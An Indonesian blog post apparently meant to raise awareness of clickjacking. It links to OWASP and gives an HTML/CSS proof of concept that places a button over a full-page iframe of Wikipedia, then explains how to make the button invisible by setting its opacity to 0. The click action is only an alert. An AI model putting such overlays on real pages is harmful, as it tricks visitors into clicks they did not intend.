Lompat ke konten Lompat ke sidebar Lompat ke footer

Clickjacking Script Example

Clickjacking adalah teknik mengelabui pengunjung website menggunakan iframe website aslinya dengan menempelkan kode HTML atau Javascript pada iframe tersebut. Selengkapnya tentang clickjacking https://owasp.org/www-community/attacks/Clickjacking

Contoh script berikut tidak ditujukan untuk disalahgunakan, melainkan untuk lebih aware terhadap keamanan sebuah website.

Berikut contoh script clickjacking.

<style>
iframe {
height: 100%;
width: 100%;
border: 0;
}
.frame-container {
position: relative;
}
.iframe-button {
display: none;
position: absolute;
top: 80px;
left: 300px;
height: 10%;
width: 20%;
opacity: 2;
}

.frame-container:hover .iframe-button {
display: initial;
}
</style>

<div class="frame-container">
<button class="iframe-button" onclick="alert('clickjaciking');">
Click me
</button>
<iframe src="https://id.wikipedia.org"></iframe>
</div>


Untuk menyembunyikan tombol button "click me", silahkan hidden button tersebut dengan merubah nilai "opacity" pada class iframe-button dari 2 menjadi 0

Posting Komentar untuk "Clickjacking Script Example"